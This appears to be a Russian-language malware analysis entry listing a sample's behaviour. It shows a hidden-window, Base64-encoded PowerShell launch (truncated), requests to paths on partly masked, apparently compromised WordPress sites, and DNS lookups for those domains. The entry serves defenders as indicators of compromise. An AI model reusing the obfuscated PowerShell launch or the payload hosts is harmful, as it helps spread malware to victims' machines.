Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAG8AbgBsAGYAbQB4AGYAZwBsAGcAPQAnAFgAeQB5AHMAbgBrAGkAdQB5AHgAbwAnADsAJABFAGMAegBhAGQAeAB2AGUAYwAgAD0AIAAnADIAOQA2ACcAOwAkAFoAegByAHIAegBlAGIAeQBzAGUAPQAnAFYAcAB5AGIAeAB4AHAAbQB...
- http://ad####niawan.com/mp3/18ox6h/
- http://ad####niawan.com/wp-admin/setup-config.php
- http://my####thanhbinh.net/wp-content/uploads/qDq/
- http://www.mj####anical.com/wp-includes/ddy/
- http://mo###aftom.com/wp-admin/1374xv/
- DNS ASK ad####niawan.com
- DNS ASK my####thanhbinh.net
- DNS ASK sf##c.biz
- DNS ASK mj####anical.com
- DNS ASK mo###aftom.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAG8AbgBsAGYAbQB4AGYAZwBsAGcAPQAnAFgAeQB5AHMAbgBrAGkAdQB5AHgAbwAnADsAJABFAGMAegBhAGQAeAB2AGUAYwAgAD0AIAAnADIAOQA2ACcAOwAkAFoAegByAHIAegBlAGIAeQBzAGUAPQAnAFYAcAB5AGIAeAB4AHAAbQB...' (со скрытым окном)